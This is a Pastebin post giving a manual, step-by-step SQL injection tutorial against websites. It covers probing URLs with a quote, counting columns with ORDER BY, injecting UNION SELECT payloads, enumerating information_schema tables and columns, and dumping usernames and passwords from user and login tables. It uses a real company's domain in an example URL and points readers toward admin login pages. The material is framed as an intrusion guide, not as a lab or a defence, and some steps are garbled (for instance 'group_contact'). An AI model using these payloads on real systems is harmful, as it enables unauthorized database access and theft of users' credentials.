Advertisement
AlienSkillZ

SQL INJECTION MANUALLY

Jul 29th, 2015
217
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.86 KB | None | 0 0
  1.  
  2. **************************************
  3. 1.)Check if it's vulnerable
  4. Add ' end URL
  5. ******************************
  6. 2.)See how many columns the website has.
  7. Type order by 7--
  8. (Continue increasing number until you reach unknown columns error)
  9.  
  10. 3.) Replace the end url number with null then Delete the order by,type union all select 1,2,3,4,5,6,7--
  11. (Put how many columns the site have which is 7)
  12.  
  13. (www.Facebook.com/products.php=12)
  14.  
  15. 4.) You'll see a few numbers choose top number or bold, Replace that number with @@Version
  16.  
  17. Note: After you hit enter a pop up of the community version will show, if its below 5.0 you'll need to do a blind SQL injection.
  18.  
  19. 5.) Replace the @@Version with group_contact(table_name)
  20. Then go to the very end of the URL type from information_schema.tables where table_schema=database()--
  21.  
  22. 6.) You'll get a list of tables names if typed correctly.
  23. Note: login,login_secured and users users are probably your target ones valuable information.
  24.  
  25. 7.) In the URL bar replace the table_name to column_name
  26. THEN
  27. *Replace information_schema.tables to
  28. Information_schema.columns
  29.  
  30. 8.)You'll see the list of columns all the website. has.Pass,username,cat,ID,mail,title etc.
  31. Note: For this tutorial we'll select the user and pass columns.
  32.  
  33. 9.) Replace column_name to
  34. username.
  35.  
  36. Note: If you just want the user name you'll just type user name.To add more columns put username,0x3a,pass with. Information_schema.columns
  37. THEN
  38. *Replace information_schema.columns where table_schema=database()-- with
  39. users--
  40.  
  41. Note: It doesn't have to be users--
  42. login-- or login_secure since those were one of our tables.
  43.  
  44. 10.)You'll see a list of user names and passwords. The user namers are first since we put them first.Example Alex252:27838427
  45.  
  46. Additional information : If you wam to get to the admin accounts go to Google search " admin page finder"
  47. Follow the site instructions .
  48.  
  49. By: AlienSkills
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement